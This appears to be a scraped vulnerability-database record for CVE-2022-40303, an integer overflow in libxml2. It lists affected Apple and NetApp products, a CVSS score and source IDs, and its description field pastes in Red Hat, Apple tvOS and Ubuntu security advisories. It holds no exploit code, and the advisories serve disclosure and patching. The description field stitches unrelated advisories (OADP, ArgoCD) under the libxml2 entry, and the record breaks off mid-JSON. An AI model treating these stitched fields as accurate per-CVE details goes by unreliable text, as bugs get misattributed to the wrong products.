iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke NxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq Pae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V Jvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou i2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y eFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m KSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ lzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8 RtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U sP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn CpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C sh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY= =i2O9 -----END PGP SIGNATURE-----
. Bugs fixed (https://bugzilla.redhat.com/):
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be 2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents 2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets
- ========================================================================== Ubuntu Security Notice USN-5760-2 December 05, 2022
libxml2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in libxml2. This update provides the corresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.
Original advisory details:
It was discovered that libxml2 incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information or cause a crash. An attacker could possibly use this issue to execute arbitrary code. (CVE-2022-40304)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM: libxml2 2.9.3+dfsg1-1ubuntu0.7+esm4 libxml2-utils 2.9.3+dfsg1-1ubuntu0.7+esm4
Ubuntu 14.04 ESM: libxml2 2.9.1+dfsg1-3ubuntu4.13+esm4 libxml2-utils 2.9.1+dfsg1-3ubuntu4.13+esm4
In general, a standard system update will make all the necessary changes
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "tvos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "16.2"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap antivirus connector",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "11.0"
},
{
"_id": null,
"model": "macos",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "12.0"
},
{
"_id": null,
"model": "iphone os",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "manageability sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ipados",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "15.7.2"
},
{
"_id": null,
"model": "libxml2",
"scope": "lt",
"trust": 1.0,
"vendor": "xmlsoft",
"version": "2.10.3"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "11.7.2"
},
{
"_id": null,
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "watchos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "9.2"
},
{
"_id": null,
"model": "active iq unified manager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "snapmanager",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.2"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "171043"
}
],
"trust": 0.6
},
"cve": "CVE-2022-40303",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2022-40303",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-40303",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-40303",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"description": {
"_id": null,
"data": "An issue was discovered in libxml2 before 2.10.3. When parsing a multi-gigabyte XML document with the XML_PARSE_HUGE parser option enabled, several integer counters can overflow. This results in an attempt to access an array at a negative 2GB offset, typically leading to a segmentation fault. It is written in C language and can be called by many languages, such as C language, C++, XSH. Currently there is no information about this vulnerability, please keep an eye on CNNVD or vendor announcements. Summary:\n\nOpenShift API for Data Protection (OADP) 1.1.2 is now available. Description:\n\nOpenShift API for Data Protection (OADP) enables you to back up and restore\napplication resources, persistent volume data, and internal container\nimages to external backup storage. OADP enables both file system-based and\nsnapshot-based backups for persistent volumes. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers\n2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters\n2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps\n2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOADP-1056 - DPA fails validation if multiple BSLs have the same provider\nOADP-1150 - Handle docker env config changes in the oadp-operator\nOADP-1217 - update velero + restic to 1.9.5\nOADP-1256 - Backup stays in progress status after restic pod is restarted due to OOM killed\nOADP-1289 - Restore partially fails with error \"Secrets \\\"deployer-token-rrjqx\\\" not found\"\nOADP-290 - Remove creation/usage of velero-privileged SCC\n\n6. Description:\n\nRed Hat Openshift GitOps is a declarative way to implement continuous\ndeployment for cloud native applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n2160492 - CVE-2023-22482 ArgoCD: JWT audience claim is not verified\n2162517 - CVE-2023-22736 argocd: Controller reconciles apps outside configured namespaces when sharding is enabled\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: libxml2 security update\nAdvisory ID: RHSA-2023:0338-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2023:0338\nIssue date: 2023-01-23\nCVE Names: CVE-2022-40303 CVE-2022-40304\n====================================================================\n1. Summary:\n\nAn update for libxml2 is now available for Red Hat Enterprise Linux 9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe libxml2 library is a development toolbox providing the implementation\nof various XML standards. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe desktop must be restarted (log out, then log back in) for this update\nto take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 9):\n\naarch64:\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-devel-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-devel-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\nlibxml2-devel-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-devel-2.9.13-3.el9_1.i686.rpm\nlibxml2-devel-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nRed Hat Enterprise Linux BaseOS (v. 9):\n\nSource:\nlibxml2-2.9.13-3.el9_1.src.rpm\n\naarch64:\nlibxml2-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-2.9.13-3.el9_1.aarch64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.aarch64.rpm\n\nppc64le:\nlibxml2-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-2.9.13-3.el9_1.ppc64le.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.ppc64le.rpm\n\ns390x:\nlibxml2-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-2.9.13-3.el9_1.s390x.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.s390x.rpm\n\nx86_64:\nlibxml2-2.9.13-3.el9_1.i686.rpm\nlibxml2-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\nlibxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.i686.rpm\nlibxml2-debugsource-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-2.9.13-3.el9_1.x86_64.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.i686.rpm\npython3-libxml2-debuginfo-2.9.13-3.el9_1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2022-40303\nhttps://access.redhat.com/security/cve/CVE-2022-40304\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2023 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2022-12-13-7 tvOS 16.2\n\ntvOS 16.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213535. \n\nAccounts\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A user may be able to view sensitive user information\nDescription: This issue was addressed with improved data protection. \nCVE-2022-42843: Mickey Jin (@patch1t)\n\nAppleAVD\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Parsing a maliciously crafted video file may lead to kernel\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46694: Andrey Labunets and Nikita Tarakanov\n\nAppleMobileFileIntegrity\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to bypass Privacy preferences\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2022-42865: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\nAVEVideoEncoder\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-42848: ABC Research s.r.o\n\nImageIO\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing a maliciously crafted file may lead to arbitrary\ncode execution\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46693: Mickey Jin (@patch1t)\n\nImageIO\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Parsing a maliciously crafted TIFF file may lead to\ndisclosure of user information\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42851: Mickey Jin (@patch1t)\n\nIOHIDFamily\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with improved state\nhandling. \nCVE-2022-42864: Tommy Muir (@Muirey03)\n\nIOMobileFrameBuffer\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: An out-of-bounds write issue was addressed with improved\ninput validation. \nCVE-2022-46690: John Aakerblom (@jaakerblom)\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: A race condition was addressed with additional\nvalidation. \nCVE-2022-46689: Ian Beer of Google Project Zero\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Connecting to a malicious NFS server may lead to arbitrary\ncode execution with kernel privileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2022-46701: Felix Poulin-Belanger\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause kernel code execution\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42842: pattern-f (@pattern_F_) of Ant Security Light-Year\nLab\n\nKernel\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app with root privileges may be able to execute arbitrary\ncode with kernel privileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42845: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxml2\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: An integer overflow was addressed through improved input\nvalidation. \nCVE-2022-40303: Maddie Stone of Google Project Zero\n\nlibxml2\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A remote user may be able to cause unexpected app termination\nor arbitrary code execution\nDescription: This issue was addressed with improved checks. \nCVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project\nZero\n\nPreferences\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to use arbitrary entitlements\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2022-42855: Ivan Fratric of Google Project Zero\n\nSafari\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Visiting a website that frames malicious content may lead to\nUI spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2022-46695: KirtiKumar Anandrao Ramchandani\n\nSoftware Update\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: A user may be able to elevate privileges\nDescription: An access issue existed with privileged API calls. This\nissue was addressed with additional restrictions. \nCVE-2022-42849: Mickey Jin (@patch1t)\n\nWeather\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: An app may be able to read sensitive location information\nDescription: The issue was addressed with improved handling of\ncaches. \nCVE-2022-42866: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A use after free issue was addressed with improved\nmemory management. \nWebKit Bugzilla: 245521\nCVE-2022-42867: Maddie Stone of Google Project Zero\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory consumption issue was addressed with improved\nmemory handling. \nWebKit Bugzilla: 245466\nCVE-2022-46691: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may bypass Same\nOrigin Policy\nDescription: A logic issue was addressed with improved state\nmanagement. \nWebKit Bugzilla: 246783\nCVE-2022-46692: KirtiKumar Anandrao Ramchandani\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may result in the\ndisclosure of process memory\nDescription: The issue was addressed with improved memory handling. \nCVE-2022-42852: hazbinhotel working with Trend Micro Zero Day\nInitiative\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nWebKit Bugzilla: 246942\nCVE-2022-46696: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 247562\nCVE-2022-46700: Samuel Gro\u00df of Google V8 Security\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may disclose\nsensitive user information\nDescription: A logic issue was addressed with improved checks. \nCVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs\n\u0026 DNSLab, Korea Univ. \n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: A memory corruption issue was addressed with improved\nstate management. \nWebKit Bugzilla: 247420\nCVE-2022-46699: Samuel Gro\u00df of Google V8 Security\nWebKit Bugzilla: 244622\nCVE-2022-42863: an anonymous researcher\n\nWebKit\nAvailable for: Apple TV 4K, Apple TV 4K (2nd generation and later),\nand Apple TV HD\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution. Apple is aware of a report that this issue\nmay have been actively exploited against versions of iOS released\nbefore iOS 15.1. \nDescription: A type confusion issue was addressed with improved state\nhandling. \nWebKit Bugzilla: 248266\nCVE-2022-42856: Cl\u00e9ment Lecigne of Google\u0027s Threat Analysis Group\n\nAdditional recognition\n\nKernel\nWe would like to acknowledge Zweig of Kunlun Lab for their\nassistance. \n\nSafari Extensions\nWe would like to acknowledge Oliver Dunk and Christian R. of\n1Password for their assistance. \n\nWebKit\nWe would like to acknowledge an anonymous researcher and scarlet for\ntheir assistance. \n\nApple TV will periodically check for software updates. Alternatively,\nyou may manually check for software updates by selecting \"Settings -\u003e\nSystem -\u003e Software Update -\u003e Update Software.\" To check the current\nversion of software, select \"Settings -\u003e General -\u003e About.\"\nAll information is also posted on the Apple Security Updates\nweb site: https://support.apple.com/en-us/HT201222. \n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFX4ACgkQ4RjMIDke\nNxkItA/+LIwJ66Odl7Uwp1N/qek5Z/TBuPKlbgTwRZGT3LBVMVmyHTBzebA88aNq\nPae1RKQ2Txw4w9Tb7a08eeqRQD51MBoSjTxf23tO1o0B1UR3Hgq3gsOSjh/dTq9V\nJvy4DpO15xdVHP3BH/li114JpgR+FoD5Du0rPffL01p6YtqeWMSvnRoCmwNcIqou\ni2ZObfdrL2WJ+IiDIlMoJ3v+B1tDxOWR6Mn37iRdzl+QgrQMQtP9pSsiAPCntA+y\neFM5Hp0JlOMtCfA+xT+LRoZHCbjTCFMRlRbNffGvrNwwdTY4MXrSYlKcIo3yFT2m\nKSHrQNvqzWhmSLAcHlUNo0lVvtPAlrgyilCYaeRNgRC1+x8KRf/AcErXr23oKknJ\nlzIF6eVk1K3mxUmR+M+P8+cr14pbrUwJcQlm0In6/8fUulHtcElLE3fJ+HJVImx8\nRtvNmuCng5iEK1zlwgDvAKO3EgMrMtduF8aygaCcBmt65GMkHwvOGCDXcIrKfH9U\nsP4eY7V3t4CQd9TX3Vlmt47MwRTSVuUtMcQeQPhEUTdUbM7UlvtW8igrLvkz9uPn\nCpuE2mzhd/dJANXvMFBR9A0ilAdJO1QD/uSWL+UbKq4BlyiW5etd8gObQfHqqW3C\nsh0EwxLh4ATicRS9btAJMwIfK/ulYDWp4yuIsUamDj/sN9xWvXY=\n=i2O9\n-----END PGP SIGNATURE-----\n\n\n. Bugs fixed (https://bugzilla.redhat.com/):\n\n2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be\n2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents\n2167819 - CVE-2023-23947 ArgoCD: Users with any cluster secret update access may update out-of-bounds cluster secrets\n\n5. ==========================================================================\nUbuntu Security Notice USN-5760-2\nDecember 05, 2022\n\nlibxml2 vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in libxml2. This update provides the\ncorresponding updates for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. \n\nOriginal advisory details:\n\n It was discovered that libxml2 incorrectly handled certain XML files. \n An attacker could possibly use this issue to expose sensitive information\n or cause a crash. \n An attacker could possibly use this issue to execute arbitrary code. \n (CVE-2022-40304)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 ESM:\n libxml2 2.9.3+dfsg1-1ubuntu0.7+esm4\n libxml2-utils 2.9.3+dfsg1-1ubuntu0.7+esm4\n\nUbuntu 14.04 ESM:\n libxml2 2.9.1+dfsg1-3ubuntu4.13+esm4\n libxml2-utils 2.9.1+dfsg1-3ubuntu4.13+esm4\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-40303"
},
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
}
],
"trust": 1.8
},
"exploit_availability": {
"_id": null,
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-429429",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
}
]
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2022-40303",
"trust": 2.0
},
{
"db": "PACKETSTORM",
"id": "170317",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170753",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171043",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170752",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170097",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170754",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170316",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169857",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171016",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170318",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169825",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170555",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171173",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169620",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170899",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170096",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170312",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170955",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169858",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169732",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171042",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171017",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170315",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171040",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171260",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202210-1031",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-429429",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2022-40303",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171310",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170668",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
},
{
"db": "VULMON",
"id": "CVE-2022-40303"
},
{
"db": "PACKETSTORM",
"id": "171310"
},
{
"db": "PACKETSTORM",
"id": "170754"
},
{
"db": "PACKETSTORM",
"id": "170753"
},
{
"db": "PACKETSTORM",
"id": "170752"
},
{
"db": "PACKETSTORM",
"id": "170668"
},
{
"db": "PACKETSTORM",
"id": "170317"
},
{
"db": "PACKETSTORM",
"id": "171043"
},
{
"db": "PACKETSTORM",
"id": "170097"
},
{
"db": "NVD",
"id": "CVE-2022-40303"
}
]
},
"id": "VAR-202210-0997",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-429429"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:15:13.442000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Debian CVElist Bug Report Logs: libxml2: CVE-2022-40303: Integer overflows with XML_PARSE_HUGE",
"trust": 0.1,
